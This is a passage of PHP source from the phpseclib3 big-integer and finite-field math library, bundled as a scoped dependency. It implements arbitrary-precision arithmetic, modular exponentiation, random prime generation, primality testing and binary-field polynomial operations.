$temp = $this->add(new static('-1')); $this->value = $temp->value; } break; case -10: case 10: // (?<!^)(?:-).*: find any -'s that aren't at the beginning and then any characters that follow that // (?<=^|-)0*: find any 0's that are preceded by the start of the string or by a - (ie. octals) // [^-0-9].*: find any non-numeric characters and then any characters that follow that $this->value = \preg_replace('#(?<!^)(?:-).*|(?<=^|-)0*|[^-0-9].*#s', '', $x); if (!\strlen($this->value) || $this->value == '-') { $this->value = '0'; } $this->initialize($base); break; case -2: case 2: if ($base > 0 && $x[0] == '-') { $this->is_negative = \true; $x = \substr($x, 1); } $x = \preg_replace('#^([01]*).*#s', '$1', $x); $temp = new static(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bits2bin($x), 128 * $base); // ie. either -16 or +16 $this->value = $temp->value; if ($temp->is_negative) { $this->is_negative = \true; } break; default: } } /** * Sets engine type. * * Throws an exception if the type is invalid * * @param class-string<Engine> $engine */ public static function setModExpEngine($engine) { $fqengine = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\' . static::ENGINE_DIR . '\\' . $engine; if (!\class_exists($fqengine) || !\method_exists($fqengine, 'isValidEngine')) { throw new \InvalidArgumentException("{$engine} is not a valid engine"); } if (!$fqengine::isValidEngine()) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException("{$engine} is not setup correctly on this system"); } static::$modexpEngine[static::class] = $fqengine; } /** * Converts a BigInteger to a byte string (eg. base-256). * * Negative numbers are saved as positive numbers, unless $twos_compliment is set to true, at which point, they're * saved as two's compliment. * @return string */ protected function toBytesHelper() { $comparison = $this->compare(new static()); if ($comparison == 0) { return $this->precision > 0 ? \str_repeat(\chr(0), $this->precision + 1 >> 3) : ''; } $temp = $comparison < 0 ? $this->add(new static(1)) : $this; $bytes = $temp->toBytes(); if (!\strlen($bytes)) { // eg. if the number we're trying to convert is -1 $bytes = \chr(0); } if (\ord($bytes[0]) & 0x80) { $bytes = \chr(0) . $bytes; } return $comparison < 0 ? ~$bytes : $bytes; } /** * Converts a BigInteger to a hex string (eg. base-16). * * @param bool $twos_compliment * @return string */ public function toHex($twos_compliment = \false) { return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($this->toBytes($twos_compliment)); } /** * Converts a BigInteger to a bit string (eg. base-2). * * Negative numbers are saved as positive numbers, unless $twos_compliment is set to true, at which point, they're * saved as two's compliment. * * @param bool $twos_compliment * @return string */ public function toBits($twos_compliment = \false) { $hex = $this->toBytes($twos_compliment); $bits = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2bits($hex); $result = $this->precision > 0 ? \substr($bits, -$this->precision) : \ltrim($bits, '0'); if ($twos_compliment && $this->compare(new static()) > 0 && $this->precision <= 0) { return '0' . $result; } return $result; } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * {@internal See {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=21 HAC 14.64} for more information.} * * @param Engine $n * @return static|false */ protected function modInverseHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $n) { // $x mod -$n == $x mod $n. $n = $n->abs(); if ($this->compare(static::$zero[static::class]) < 0) { $temp = $this->abs(); $temp = $temp->modInverse($n); return $this->normalize($n->subtract($temp)); } \extract($this->extendedGCD($n)); /** * @var Engine $gcd * @var Engine $x */ if (!$gcd->equals(static::$one[static::class])) { return \false; } $x = $x->compare(static::$zero[static::class]) < 0 ? $x->add($n) : $x; return $this->compare(static::$zero[static::class]) < 0 ? $this->normalize($n->subtract($x)) : $this->normalize($x); } /** * Serialize * * Will be called, automatically, when serialize() is called on a BigInteger object. * * @return array */ public function __sleep() { $this->hex = $this->toHex(\true); $vars = ['hex']; if ($this->precision > 0) { $vars[] = 'precision'; } return $vars; } /** * Serialize * * Will be called, automatically, when unserialize() is called on a BigInteger object. * * @return void */ public function __wakeup() { $temp = new static($this->hex, -16); $this->value = $temp->value; $this->is_negative = $temp->is_negative; if ($this->precision > 0) { // recalculate $this->bitmask $this->setPrecision($this->precision); } } /** * JSON Serialize * * Will be called, automatically, when json_encode() is called on a BigInteger object. * * @return array{hex: string, precision?: int] */ #[\ReturnTypeWillChange] public function jsonSerialize() { $result = ['hex' => $this->toHex(\true)]; if ($this->precision > 0) { $result['precision'] = $this->precision; } return $result; } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function __toString() { return $this->toString(); } /** * __debugInfo() magic method * * Will be called, automatically, when print_r() or var_dump() are called * * @return array */ public function __debugInfo() { $result = ['value' => '0x' . $this->toHex(\true), 'engine' => \basename(static::class)]; return $this->precision > 0 ? $result + ['precision' => $this->precision] : $result; } /** * Set Precision * * Some bitwise operations give different results depending on the precision being used. Examples include left * shift, not, and rotates. * * @param int $bits */ public function setPrecision($bits) { if ($bits < 1) { $this->precision = -1; $this->bitmask = \false; return; } $this->precision = $bits; $this->bitmask = static::setBitmask($bits); $temp = $this->normalize($this); $this->value = $temp->value; } /** * Get Precision * * Returns the precision if it exists, -1 if it doesn't * * @return int */ public function getPrecision() { return $this->precision; } /** * Set Bitmask * @return static * @param int $bits * @see self::setPrecision() */ protected static function setBitmask($bits) { return new static(\chr((1 << ($bits & 0x7)) - 1) . \str_repeat(\chr(0xff), $bits >> 3), 256); } /** * Logical Not * * @return Engine|string */ public function bitwise_not() { // calculuate "not" without regard to $this->precision // (will always result in a smaller number. ie. ~1 isn't 1111 1110 - it's 0) $temp = $this->toBytes(); if ($temp == '') { return $this->normalize(static::$zero[static::class]); } $pre_msb = \decbin(\ord($temp[0])); $temp = ~$temp; $msb = \decbin(\ord($temp[0])); if (\strlen($msb) == 8) { $msb = \substr($msb, \strpos($msb, '0')); } $temp[0] = \chr(\bindec($msb)); // see if we need to add extra leading 1's $current_bits = \strlen($pre_msb) + 8 * \strlen($temp) - 8; $new_bits = $this->precision - $current_bits; if ($new_bits <= 0) { return $this->normalize(new static($temp, 256)); } // generate as many leading 1's as we need to. $leading_ones = \chr((1 << ($new_bits & 0x7)) - 1) . \str_repeat(\chr(0xff), $new_bits >> 3); self::base256_lshift($leading_ones, $current_bits); $temp = \str_pad($temp, \strlen($leading_ones), \chr(0), \STR_PAD_LEFT); return $this->normalize(new static($leading_ones | $temp, 256)); } /** * Logical Left Shift * * Shifts binary strings $shift bits, essentially multiplying by 2**$shift. * * @param string $x * @param int $shift * @return void */ protected static function base256_lshift(&$x, $shift) { if ($shift == 0) { return; } $num_bytes = $shift >> 3; // eg. floor($shift/8) $shift &= 7; // eg. $shift % 8 $carry = 0; for ($i = \strlen($x) - 1; $i >= 0; --$i) { $temp = \ord($x[$i]) << $shift | $carry; $x[$i] = \chr($temp); $carry = $temp >> 8; } $carry = $carry != 0 ? \chr($carry) : ''; $x = $carry . $x . \str_repeat(\chr(0), $num_bytes); } /** * Logical Left Rotate * * Instead of the top x bits being dropped they're appended to the shifted bit string. * * @param int $shift * @return Engine */ public function bitwise_leftRotate($shift) { $bits = $this->toBytes(); if ($this->precision > 0) { $precision = $this->precision; if (static::FAST_BITWISE) { $mask = $this->bitmask->toBytes(); } else { $mask = $this->bitmask->subtract(new static(1)); $mask = $mask->toBytes(); } } else { $temp = \ord($bits[0]); for ($i = 0; $temp >> $i; ++$i) { } $precision = 8 * \strlen($bits) - 8 + $i; $mask = \chr((1 << ($precision & 0x7)) - 1) . \str_repeat(\chr(0xff), $precision >> 3); } if ($shift < 0) { $shift += $precision; } $shift %= $precision; if (!$shift) { return clone $this; } $left = $this->bitwise_leftShift($shift); $left = $left->bitwise_and(new static($mask, 256)); $right = $this->bitwise_rightShift($precision - $shift); $result = static::FAST_BITWISE ? $left->bitwise_or($right) : $left->add($right); return $this->normalize($result); } /** * Logical Right Rotate * * Instead of the bottom x bits being dropped they're prepended to the shifted bit string. * * @param int $shift * @return Engine */ public function bitwise_rightRotate($shift) { return $this->bitwise_leftRotate(-$shift); } /** * Returns the smallest and largest n-bit number * * @param int $bits * @return array{min: static, max: static} */ public static function minMaxBits($bits) { $bytes = $bits >> 3; $min = \str_repeat(\chr(0), $bytes); $max = \str_repeat(\chr(0xff), $bytes); $msb = $bits & 7; if ($msb) { $min = \chr(1 << $msb - 1) . $min; $max = \chr((1 << $msb) - 1) . $max; } else { $min[0] = \chr(0x80); } return ['min' => new static($min, 256), 'max' => new static($max, 256)]; } /** * Return the size of a BigInteger in bits * * @return int */ public function getLength() { return \strlen($this->toBits()); } /** * Return the size of a BigInteger in bytes * * @return int */ public function getLengthInBytes() { return (int) \ceil($this->getLength() / 8); } /** * Performs some pre-processing for powMod * * @param Engine $e * @param Engine $n * @return static|false */ protected function powModOuter(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $n) { $n = $this->bitmask !== \false && $this->bitmask->compare($n) < 0 ? $this->bitmask : $n->abs(); if ($e->compare(new static()) < 0) { $e = $e->abs(); $temp = $this->modInverse($n); if ($temp === \false) { return \false; } return $this->normalize($temp->powModInner($e, $n)); } if ($this->compare($n) > 0) { list(, $temp) = $this->divide($n); return $temp->powModInner($e, $n); } return $this->powModInner($e, $n); } /** * Sliding Window k-ary Modular Exponentiation * * Based on {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=27 HAC 14.85} / * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=210 MPM 7.7}. In a departure from those algorithims, * however, this function performs a modular reduction after every multiplication and squaring operation. * As such, this function has the same preconditions that the reductions being used do. * * @template T of Engine * @param Engine $x * @param Engine $e * @param Engine $n * @param class-string<T> $class * @return T */ protected static function slidingWindow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $n, $class) { static $window_ranges = [7, 25, 81, 241, 673, 1793]; // from BigInteger.java's oddModPow function //static $window_ranges = [0, 7, 36, 140, 450, 1303, 3529]; // from MPM 7.3.1 $e_bits = $e->toBits(); $e_length = \strlen($e_bits); // calculate the appropriate window size. // $window_size == 3 if $window_ranges is between 25 and 81, for example. for ($i = 0, $window_size = 1; $i < \count($window_ranges) && $e_length > $window_ranges[$i]; ++$window_size, ++$i) { } $n_value = $n->value; if (\method_exists(static::class, 'generateCustomReduction')) { static::generateCustomReduction($n, $class); } // precompute $this^0 through $this^$window_size $powers = []; $powers[1] = static::prepareReduce($x->value, $n_value, $class); $powers[2] = static::squareReduce($powers[1], $n_value, $class); // we do every other number since substr($e_bits, $i, $j+1) (see below) is supposed to end // in a 1. ie. it's supposed to be odd. $temp = 1 << $window_size - 1; for ($i = 1; $i < $temp; ++$i) { $i2 = $i << 1; $powers[$i2 + 1] = static::multiplyReduce($powers[$i2 - 1], $powers[2], $n_value, $class); } $result = new $class(1); $result = static::prepareReduce($result->value, $n_value, $class); for ($i = 0; $i < $e_length;) { if (!$e_bits[$i]) { $result = static::squareReduce($result, $n_value, $class); ++$i; } else { for ($j = $window_size - 1; $j > 0; --$j) { if (!empty($e_bits[$i + $j])) { break; } } // eg. the length of substr($e_bits, $i, $j + 1) for ($k = 0; $k <= $j; ++$k) { $result = static::squareReduce($result, $n_value, $class); } $result = static::multiplyReduce($result, $powers[\bindec(\substr($e_bits, $i, $j + 1))], $n_value, $class); $i += $j + 1; } } $temp = new $class(); $temp->value = static::reduce($result, $n_value, $class); return $temp; } /** * Generates a random number of a certain size * * Bit length is equal to $size * * @param int $size * @return Engine */ public static function random($size) { \extract(static::minMaxBits($size)); /** * @var BigInteger $min * @var BigInteger $max */ return static::randomRange($min, $max); } /** * Generates a random prime number of a certain size * * Bit length is equal to $size * * @param int $size * @return Engine */ public static function randomPrime($size) { \extract(static::minMaxBits($size)); /** * @var static $min * @var static $max */ return static::randomRangePrime($min, $max); } /** * Performs some pre-processing for randomRangePrime * * @param Engine $min * @param Engine $max * @return static|false */ protected static function randomRangePrimeOuter(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $max) { $compare = $max->compare($min); if (!$compare) { return $min->isPrime() ? $min : \false; } elseif ($compare < 0) { // if $min is bigger then $max, swap $min and $max $temp = $max; $max = $min; $min = $temp; } $length = $max->getLength(); if ($length > 8196) { throw new \RuntimeException("Generation of random prime numbers larger than 8196 has been disabled ({$length})"); } $x = static::randomRange($min, $max); return static::randomRangePrimeInner($x, $min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param Engine $min * @param Engine $max * @return Engine */ protected static function randomRangeHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $max) { $compare = $max->compare($min); if (!$compare) { return $min; } elseif ($compare < 0) { // if $min is bigger then $max, swap $min and $max $temp = $max; $max = $min; $min = $temp; } if (!isset(static::$one[static::class])) { static::$one[static::class] = new static(1); } $max = $max->subtract($min->subtract(static::$one[static::class])); $size = \strlen(\ltrim($max->toBytes(), \chr(0))); /* doing $random % $max doesn't work because some numbers will be more likely to occur than others. eg. if $max is 140 and $random's max is 255 then that'd mean both $random = 5 and $random = 145 would produce 5 whereas the only value of random that could produce 139 would be 139. ie. not all numbers would be equally likely. some would be more likely than others. creating a whole new random number until you find one that is within the range doesn't work because, for sufficiently small ranges, the likelihood that you'd get a number within that range would be pretty small. eg. with $random's max being 255 and if your $max being 1 the probability would be pretty high that $random would be greater than $max. phpseclib works around this using the technique described here: http://crypto.stackexchange.com/questions/5708/creating-a-small-number-from-a-cryptographically-secure-random-string */ $random_max = new static(\chr(1) . \str_repeat("\x00", $size), 256); $random = new static(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string($size), 256); list($max_multiple) = $random_max->divide($max); $max_multiple = $max_multiple->multiply($max); while ($random->compare($max_multiple) >= 0) { $random = $random->subtract($max_multiple); $random_max = $random_max->subtract($max_multiple); $random = $random->bitwise_leftShift(8); $random = $random->add(new static(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(1), 256)); $random_max = $random_max->bitwise_leftShift(8); list($max_multiple) = $random_max->divide($max); $max_multiple = $max_multiple->multiply($max); } list(, $random) = $random->divide($max); return $random->add($min); } /** * Performs some post-processing for randomRangePrime * * @param Engine $x * @param Engine $min * @param Engine $max * @return static|false */ protected static function randomRangePrimeInner(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $max) { if (!isset(static::$two[static::class])) { static::$two[static::class] = new static('2'); } $x->make_odd(); if ($x->compare($max) > 0) { // if $x > $max then $max is even and if $min == $max then no prime number exists between the specified range if ($min->equals($max)) { return \false; } $x = clone $min; $x->make_odd(); } $initial_x = clone $x; while (\true) { if ($x->isPrime()) { return $x; } $x = $x->add(static::$two[static::class]); if ($x->compare($max) > 0) { $x = clone $min; if ($x->equals(static::$two[static::class])) { return $x; } $x->make_odd(); } if ($x->equals($initial_x)) { return \false; } } } /** * Sets the $t parameter for primality testing * * @return int */ protected function setupIsPrime() { $length = $this->getLengthInBytes(); // see HAC 4.49 "Note (controlling the error probability)" // @codingStandardsIgnoreStart if ($length >= 163) { $t = 2; } else { if ($length >= 106) { $t = 3; } else { if ($length >= 81) { $t = 4; } else { if ($length >= 68) { $t = 5; } else { if ($length >= 56) { $t = 6; } else { if ($length >= 50) { $t = 7; } else { if ($length >= 43) { $t = 8; } else { if ($length >= 37) { $t = 9; } else { if ($length >= 31) { $t = 12; } else { if ($length >= 25) { $t = 15; } else { if ($length >= 18) { $t = 18; } else { $t = 27; } } } } } } } } } } } // @codingStandardsIgnoreEnd return $t; } /** * Tests Primality * * Uses the {@link http://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test Miller-Rabin primality test}. * See {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap4.pdf#page=8 HAC 4.24} for more info. * * @param int $t * @return bool */ protected function testPrimality($t) { if (!$this->testSmallPrimes()) { return \false; } $n = clone $this; $n_1 = $n->subtract(static::$one[static::class]); $n_2 = $n->subtract(static::$two[static::class]); $r = clone $n_1; $s = static::scan1divide($r); for ($i = 0; $i < $t; ++$i) { $a = static::randomRange(static::$two[static::class], $n_2); $y = $a->modPow($r, $n); if (!$y->equals(static::$one[static::class]) && !$y->equals($n_1)) { for ($j = 1; $j < $s && !$y->equals($n_1); ++$j) { $y = $y->modPow(static::$two[static::class], $n); if ($y->equals(static::$one[static::class])) { return \false; } } if (!$y->equals($n_1)) { return \false; } } } return \true; } /** * Checks a numer to see if it's prime * * Assuming the $t parameter is not set, this function has an error rate of 2**-80. The main motivation for the * $t parameter is distributability. BigInteger::randomPrime() can be distributed across multiple pageloads * on a website instead of just one. * * @param int|bool $t * @return bool */ public function isPrime($t = \false) { // OpenSSL limits RSA keys to 16384 bits. The length of an RSA key is equal to the length of the modulo, which is // produced by multiplying the primes p and q by one another. The largest number two 8196 bit primes can produce is // a 16384 bit number so, basically, 8196 bit primes are the largest OpenSSL will generate and if that's the largest // that it'll generate it also stands to reason that that's the largest you'll be able to test primality on $length = $this->getLength(); if ($length > 8196) { throw new \RuntimeException("Primality testing is not supported for numbers larger than 8196 bits ({$length})"); } if (!$t) { $t = $this->setupIsPrime(); } return $this->testPrimality($t); } /** * Performs a few preliminary checks on root * * @param int $n * @return Engine */ protected function rootHelper($n) { if ($n < 1) { return clone static::$zero[static::class]; } // we want positive exponents if ($this->compare(static::$one[static::class]) < 0) { return clone static::$zero[static::class]; } // we want positive numbers if ($this->compare(static::$two[static::class]) < 0) { return clone static::$one[static::class]; } // n-th root of 1 or 2 is 1 return $this->rootInner($n); } /** * Calculates the nth root of a biginteger. * * Returns the nth root of a positive biginteger, where n defaults to 2 * * {@internal This function is based off of {@link http://mathforum.org/library/drmath/view/52605.html this page} and {@link http://stackoverflow.com/questions/11242920/calculating-nth-root-with-bcmath-in-php this stackoverflow question}.} * * @param int $n * @return Engine */ protected function rootInner($n) { $n = new static($n); // g is our guess number $g = static::$two[static::class]; // while (g^n < num) g=g*2 while ($g->pow($n)->compare($this) < 0) { $g = $g->multiply(static::$two[static::class]); } // if (g^n==num) num is a power of 2, we're lucky, end of job // == 0 bccomp(bcpow($g, $n), $n->value)==0 if ($g->pow($n)->equals($this) > 0) { $root = $g; return $this->normalize($root); } // if we're here num wasn't a power of 2 :( $og = $g; // og means original guess and here is our upper bound $g = $g->divide(static::$two[static::class])[0]; // g is set to be our lower bound $step = $og->subtract($g)->divide(static::$two[static::class])[0]; // step is the half of upper bound - lower bound $g = $g->add($step); // we start at lower bound + step , basically in the middle of our interval // while step>1 while ($step->compare(static::$one[static::class]) == 1) { $guess = $g->pow($n); $step = $step->divide(static::$two[static::class])[0]; $comp = $guess->compare($this); // compare our guess with real number switch ($comp) { case -1: // if guess is lower we add the new step $g = $g->add($step); break; case 1: // if guess is higher we sub the new step $g = $g->subtract($step); break; case 0: // if guess is exactly the num we're done, we return the value $root = $g; break 2; } } if ($comp == 1) { $g = $g->subtract($step); } // whatever happened, g is the closest guess we can make so return it $root = $g; return $this->normalize($root); } /** * Calculates the nth root of a biginteger. * * @param int $n * @return Engine */ public function root($n = 2) { return $this->rootHelper($n); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param array $nums * @return Engine */ protected static function minHelper(array $nums) { if (\count($nums) == 1) { return $nums[0]; } $min = $nums[0]; for ($i = 1; $i < \count($nums); $i++) { $min = $min->compare($nums[$i]) > 0 ? $nums[$i] : $min; } return $min; } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param array $nums * @return Engine */ protected static function maxHelper(array $nums) { if (\count($nums) == 1) { return $nums[0]; } $max = $nums[0]; for ($i = 1; $i < \count($nums); $i++) { $max = $max->compare($nums[$i]) < 0 ? $nums[$i] : $max; } return $max; } /** * Create Recurring Modulo Function * * Sometimes it may be desirable to do repeated modulos with the same number outside of * modular exponentiation * * @return callable */ public function createRecurringModuloFunction() { $class = static::class; $fqengine = !\method_exists(static::$modexpEngine[static::class], 'reduce') ? '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\' . static::ENGINE_DIR . '\\DefaultEngine' : static::$modexpEngine[static::class]; if (\method_exists($fqengine, 'generateCustomReduction')) { $func = $fqengine::generateCustomReduction($this, static::class); return eval('return function(' . static::class . ' $x) use ($func, $class) { $r = new $class(); $r->value = $func($x->value); return $r; };'); } $n = $this->value; return eval('return function(' . static::class . ' $x) use ($n, $fqengine, $class) { $r = new $class(); $r->value = $fqengine::reduce($x->value, $n, $class); return $r; };'); } /** * Calculates the greatest common divisor and Bezout's identity. * * @param Engine $n * @return array{gcd: Engine, x: Engine, y: Engine} */ protected function extendedGCDHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $n) { $u = clone $this; $v = clone $n; $one = new static(1); $zero = new static(); $a = clone $one; $b = clone $zero; $c = clone $zero; $d = clone $one; while (!$v->equals($zero)) { list($q) = $u->divide($v); $temp = $u; $u = $v; $v = $temp->subtract($v->multiply($q)); $temp = $a; $a = $c; $c = $temp->subtract($a->multiply($q)); $temp = $b; $b = $d; $d = $temp->subtract($b->multiply($q)); } return ['gcd' => $u, 'x' => $a, 'y' => $b]; } /** * Bitwise Split * * Splits BigInteger's into chunks of $split bits * * @param int $split * @return Engine[] */ public function bitwise_split($split) { if ($split < 1) { throw new \RuntimeException('Offset must be greater than 1'); } $mask = static::$one[static::class]->bitwise_leftShift($split)->subtract(static::$one[static::class]); $num = clone $this; $vals = []; while (!$num->equals(static::$zero[static::class])) { $vals[] = $num->bitwise_and($mask); $num = $num->bitwise_rightShift($split); } return \array_reverse($vals); } /** * Logical And * * @param Engine $x * @return Engine */ protected function bitwiseAndHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $x) { $left = $this->toBytes(\true); $right = $x->toBytes(\true); $length = \max(\strlen($left), \strlen($right)); $left = \str_pad($left, $length, \chr(0), \STR_PAD_LEFT); $right = \str_pad($right, $length, \chr(0), \STR_PAD_LEFT); return $this->normalize(new static($left & $right, -256)); } /** * Logical Or * * @param Engine $x * @return Engine */ protected function bitwiseOrHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $x) { $left = $this->toBytes(\true); $right = $x->toBytes(\true); $length = \max(\strlen($left), \strlen($right)); $left = \str_pad($left, $length, \chr(0), \STR_PAD_LEFT); $right = \str_pad($right, $length, \chr(0), \STR_PAD_LEFT); return $this->normalize(new static($left | $right, -256)); } /** * Logical Exclusive Or * * @param Engine $x * @return Engine */ protected function bitwiseXorHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $x) { $left = $this->toBytes(\true); $right = $x->toBytes(\true); $length = \max(\strlen($left), \strlen($right)); $left = \str_pad($left, $length, \chr(0), \STR_PAD_LEFT); $right = \str_pad($right, $length, \chr(0), \STR_PAD_LEFT); return $this->normalize(new static($left ^ $right, -256)); } } <?php /** * Finite Field Integer Base Class * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField; /** * Finite Field Integer * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Integer implements \JsonSerializable { /** * JSON Serialize * * Will be called, automatically, when json_encode() is called on a BigInteger object. * * PHP Serialize isn't supported because unserializing would require the factory be * serialized as well and that just sounds like too much * * @return array{hex: string} */ #[\ReturnTypeWillChange] public function jsonSerialize() { return ['hex' => $this->toHex(\true)]; } /** * Converts an Integer to a hex string (eg. base-16). * * @return string */ public abstract function toHex(); } <?php /** * Finite Fields Base Class * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\Common; /** * Finite Fields * * @author Jim Wigginton <terrafrost@php.net> */ abstract class FiniteField { } <?php /** * Binary Finite Fields * * In a binary finite field numbers are actually polynomial equations. If you * represent the number as a sequence of bits you get a sequence of 1's or 0's. * These 1's or 0's represent the coefficients of the x**n, where n is the * location of the given bit. When you add numbers over a binary finite field * the result should have a coefficient of 1 or 0 as well. Hence addition * and subtraction become the same operation as XOR. * eg. 1 + 1 + 1 == 3 % 2 == 1 or 0 - 1 == -1 % 2 == 1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField; use Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField\Integer as Base; /** * Binary Finite Fields * * @author Jim Wigginton <terrafrost@php.net> */ class Integer extends \Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField\Integer { /** * Holds the BinaryField's value * * @var string */ protected $value; /** * Keeps track of current instance * * @var int */ protected $instanceID; /** * Holds the PrimeField's modulo * * @var array<int, string> */ protected static $modulo; /** * Holds a pre-generated function to perform modulo reductions * * @var callable[] */ protected static $reduce; /** * Default constructor */ public function __construct($instanceID, $num = '') { $this->instanceID = $instanceID; if (!\strlen($num)) { $this->value = ''; } else { $reduce = static::$reduce[$instanceID]; $this->value = $reduce($num); } } /** * Set the modulo for a given instance * @param int $instanceID * @param string $modulo */ public static function setModulo($instanceID, $modulo) { static::$modulo[$instanceID] = $modulo; } /** * Set the modulo for a given instance */ public static function setRecurringModuloFunction($instanceID, callable $function) { static::$reduce[$instanceID] = $function; } /** * Tests a parameter to see if it's of the right instance * * Throws an exception if the incorrect class is being utilized */ private static function checkInstance(self $x, self $y) { if ($x->instanceID != $y->instanceID) { throw new \UnexpectedValueException('The instances of the two BinaryField\\Integer objects do not match'); } } /** * Tests the equality of two numbers. * * @return bool */ public function equals(self $x) { static::checkInstance($this, $x); return $this->value == $x->value; } /** * Compares two numbers. * * @return int */ public function compare(self $x) { static::checkInstance($this, $x); $a = $this->value; $b = $x->value; $length = \max(\strlen($a), \strlen($b)); $a = \str_pad($a, $length, "\x00", \STR_PAD_LEFT); $b = \str_pad($b, $length, "\x00", \STR_PAD_LEFT); return \strcmp($a, $b); } /** * Returns the degree of the polynomial * * @param string $x * @return int */ private static function deg($x) { $x = \ltrim($x, "\x00"); $xbit = \decbin(\ord($x[0])); $xlen = $xbit == '0' ? 0 : \strlen($xbit); $len = \strlen($x); if (!$len) { return -1; } return 8 * \strlen($x) - 9 + $xlen; } /** * Perform polynomial division * * @return string[] * @link https://en.wikipedia.org/wiki/Polynomial_greatest_common_divisor#Euclidean_division */ private static function polynomialDivide($x, $y) { // in wikipedia's description of the algorithm, lc() is the leading coefficient. over a binary field that's // always going to be 1. $q = \chr(0); $d = static::deg($y); $r = $x; while (($degr = static::deg($r)) >= $d) { $s = '1' . \str_repeat('0', $degr - $d); $s = \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField::base2ToBase256($s); $length = \max(\strlen($s), \strlen($q)); $q = !isset($q) ? $s : \str_pad($q, $length, "\x00", \STR_PAD_LEFT) ^ \str_pad($s, $length, "\x00", \STR_PAD_LEFT); $s = static::polynomialMultiply($s, $y); $length = \max(\strlen($r), \strlen($s)); $r = \str_pad($r, $length, "\x00", \STR_PAD_LEFT) ^ \str_pad($s, $length, "\x00", \STR_PAD_LEFT); } return [\ltrim($q, "\x00"), \ltrim($r, "\x00")]; } /** * Perform polynomial multiplation in the traditional way * * @return string * @link https://en.wikipedia.org/wiki/Finite_field_arithmetic#Multiplication */ private static function regularPolynomialMultiply($x, $y) { $precomputed = [\ltrim($x, "\x00")]; $x = \strrev(\Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField::base256ToBase2($x)); $y = \strrev(\Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField::base256ToBase2($y)); if (\strlen($x) == \strlen($y)) { $length = \strlen($x); } else { $length = \max(\strlen($x), \strlen($y)); $x = \str_pad($x, $length, '0'); $y = \str_pad($y, $length, '0'); } $result = \str_repeat('0', 2 * $length - 1); $result = \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField::base2ToBase256($result); $size = \strlen($result); $x = \strrev($x); // precompute left shift 1 through 7 for ($i = 1; $i < 8; $i++) { $precomputed[$i] = \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField::base2ToBase256($x . \str_repeat('0', $i)); } for ($i = 0; $i < \strlen($y); $i++) { if ($y[$i] == '1') { $temp = $precomputed[$i & 7] . \str_repeat("\x00", $i >> 3); $result ^= \str_pad($temp, $size, "\x00", \STR_PAD_LEFT); } } return $result; } /** * Perform polynomial multiplation * * Uses karatsuba multiplication to reduce x-bit multiplications to a series of 32-bit multiplications * * @return string * @link https://en.wikipedia.org/wiki/Karatsuba_algorithm */ private static function polynomialMultiply($x, $y) { if (\strlen($x) == 